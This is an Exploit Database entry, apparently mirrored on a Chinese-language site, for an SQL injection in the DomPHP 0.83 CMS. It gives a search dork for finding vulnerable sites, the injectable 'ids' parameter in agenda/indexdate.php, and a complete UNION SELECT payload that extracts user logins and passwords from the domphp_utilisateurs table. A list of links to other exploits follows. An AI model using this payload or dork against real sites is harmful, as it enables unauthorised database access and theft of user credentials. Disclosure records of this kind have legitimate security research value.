DomPHP 0.83 – SQL Injection

Exploit Database
35 阅读

作者： Houssamix

日期： 2014-01-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/30872/

-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix 
= Script : DomPHP <= v0.83

= Download : http://www.domphp.com/download/

= BUG :SQL Injection Vulnerability 
 
= DORK : Site créé à l'aide du CMS DomPHP v0.83 
 
= Exploit : 
http://[target]/agenda/indexdate.php?ids=77 [SQL]
 
Exemple : 				 

http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--

last Exploits
DomPHP 0.83 – SQL Injection的更多信息

ResourceSpace 6.4.5976 – Cross-Site Scripting / SQL Injection / Insecure Cookie Handling：
PHP-Fusion 9.03.50 – ‘panels.php’ Remote Code Execution：
Web Terra 1.1 – ‘books.cgi’ Remote Command Execution：
Online store PHP script – Multiple Cross-Site Scripting / SQL Injections：
Linksys EA7500 2.0.8.194281 – Cross-Site Scripting：
WordPress Plugin Event Registration 5.44 – SQL Injection：
Pluck CMS 4.7 – Directory Traversal：
OpenEMR 4.1.1 Patch 14 – Multiple Vulnerabilities：